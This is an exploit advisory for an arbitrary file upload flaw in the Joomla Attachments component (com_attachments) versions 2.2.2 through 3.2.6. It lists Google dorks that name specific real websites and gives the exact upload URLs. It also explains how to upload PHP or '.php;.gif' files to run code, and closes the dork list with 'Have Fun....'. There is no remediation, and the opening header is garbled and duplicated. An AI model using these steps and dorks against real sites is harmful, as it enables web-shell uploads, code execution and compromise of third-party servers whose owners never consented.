Joomla Attachments 3.x File Upload

####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : ####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] :
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a
remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation
of file extensions by the multiple scripts to index.php. The issue occurs because
the application fails to adequately sanitize user-supplied input.
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access
or privilege escalation; other attacks may also possible.
By sending a specially-crafted HTTP request, a remote attacker could exploit
this vulnerability to upload a malicious PHP script, which could allow the
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public "

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################